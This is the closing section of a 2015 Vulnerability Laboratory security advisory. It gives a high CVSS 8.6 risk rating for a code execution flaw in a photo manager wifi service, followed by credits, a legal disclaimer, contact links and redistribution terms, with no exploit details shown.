The security risk of the code execution vulnerability in the photo manager wifi service is estimated as high. (CVSS 8.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt